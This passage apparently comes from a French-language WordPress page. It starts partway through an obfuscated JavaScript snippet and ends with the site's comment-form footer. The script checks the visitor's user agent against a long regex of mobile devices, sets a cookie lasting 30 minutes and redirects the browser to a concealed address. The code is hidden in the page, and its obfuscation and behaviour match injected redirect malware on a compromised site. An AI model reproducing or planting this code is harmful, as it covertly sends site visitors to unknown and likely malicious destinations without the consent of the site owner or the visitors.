)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.